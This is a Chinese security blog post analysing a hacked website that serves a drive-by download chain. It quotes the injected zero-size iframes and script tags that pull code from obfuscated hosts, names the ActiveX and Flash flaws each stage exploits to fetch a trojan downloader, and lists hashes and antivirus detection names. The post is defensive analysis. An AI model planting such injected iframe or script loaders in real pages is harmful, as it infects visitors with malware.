某网站挂Trojan-Downloader.SWF.Small利用flash漏洞传播Trojan-Downloader.Win32.Small

原创

PurpleEndurer 2022-11-15 15:39:08 博主文章分类：系统安全 ©著作权

文章标签 flash iframe javascript 解密 c 文章分类 虚拟化云计算

©著作权归作者所有：来自51CTO博客作者PurpleEndurer的原创作品，请联系作者获取转载授权，否则将追究法律责任

某网站挂Trojan-Downloader.SWF.Small利用flash漏洞传播Trojan-Downloader.Win32.Small

endurer 原创
2008-06-02 第1版

该网站包含代码：
/---
＜iframe src=hxxp://www.m**m*e*x*e**.com/alexa.html width=0 height=0＞＜/iframe＞
---/

#1 hxxp://www.m**m*e*x*e**.com/alexa.html 内容为：
/---
＜script language="javascript" type="text/javascript"＞
window.location="hxxp://www.u**i**u**ou.net/6.htm";
＜/script＞
---/

#1.1 hxxp://www.u**i**u**ou.net/6.htm包含代码：
/---
＜iframe src=news.html width=100 height=0＞＜/iframe＞
---/

#1.1.1 hxxp://www.u**i**u**ou.net/news.html

在解密过程卡巴斯基已检测到: 木马程序 Trojan-Downloader.JS.Agent.byj

输出代码：
/---
＜script src=hxxp://*fuck**.g**o-*3**6*0*.net/ms06014.js＞＜/script＞
＜EMBED src=hxxp://*fuck**.g**o-*3**6*0*.net/versionff.swf width=0 height=0＞
＜iframe style=display:none src="hxxp://*fuck**.g**o-*3**6*0*.net/GLWORLD.html"＞＜/iframe＞
＜sCrIpT LAnGuAgE="jAvAsCrIpT" src=hxxp://*fuck**.g**o-*3**6*0*.net/real.js＞＜/script＞
＜iframe style=display:none src="hxxp://*fuck**.g**o-*3**6*0*.net/Real.html"＞＜/iframe＞
＜iframe width=100 height=0 src=hxxp://*fuck**.g**o-*3**6*0*.net/Thunder.html＞＜/iframe＞
---/

#1.1.1.1 hxxp://*fuck**.g**o-*3**6*0*.net/ms06014.js（卡巴斯基已检测到: 木马程序 Trojan-Downloader.JS.Small.lw）

利用MS06-014漏洞下载 hxxp://user1**.1**2*-***23.net/bak.css

文件说明符 : D:/test/bak.css
属性 : A---
M$签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-6-2 12:13:57
修改时间 : 2008-6-2 12:13:57
大小 : 13840 字节 13.528 KB
MD5 : 7806c353c9643b85d9a7229be7273de0
SHA1: A37F4233AD1EBC1548C65B041491A7004454D413
CRC32: 2ae34afc

卡巴斯基报为 Trojan-Downloader.Win32.Small.iyq，瑞星报为 Trojan.DL.Win32.Mnless.agu

#1.1.1.2 hxxp://*fuck**.g**o-*3**6*0*.net/GLWORLD.html

利用联众游戏（GLIEDown.IEDown.1，clsid:61F5C358-60FB-4A23-A312-D2B556620F20）漏洞下载 hxxp://user1**.1**2*-***23.net/bak.css

#1.1.1.3 hxxp://*fuck**.g**o-*3**6*0*.net/real.js

利用RealPlayer（IERPCtl.IERPCtl.1，clsid:CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA）漏洞下载 hxxp://user1**.1**2*-***23.net/bak.css

#1.1.1.4 hxxp://*fuck**.g**o-*3**6*0*.net/Real.html

利用RealPlayer（IERPCtl.IERPCtl.1，clsid:CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA）漏洞下载 hxxp://user1**.1**2*-***23.net/bak.css

#1.1.1.5 hxxp://*fuck**.g**o-*3**6*0*.net/Thunder.html
利用迅雷（DPClient.Vod，clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F
）漏洞下载 hxxp://user1**.1**2*-***23.net/bak.css

#1.1.1.6 hxxp://*fuck**.g**o-*3**6*0*.net/versionie.swf
利用Flash（ShockwaveFlash.ShockwaveFlash.9）漏洞下载 hxxp://user1**.1**2*-***23.net/bak.css

文件说明符 : D:/test/versionie.swf
属性 : A---
M$签名:否
PE文件:否
获取文件版本信息大小失败!
创建时间 : 2008-6-2 12:13:56
修改时间 : 2008-6-2 12:35:34
大小 : 133 字节
MD5 : e1bc4891359a7a8b4aabc837593860be
SHA1: 4A177911641401A58C22D00545A67B91EBB79E66
CRC32: 9e64316f

卡巴斯基报为：Trojan-Downloader.SWF.Small.bb

#1.1.1.7 利用 BaiduBar.Tool 下载 hxxp://*fuck**.g**o-*3**6*0*.net/Baidu.cab，内含 Baidu.exe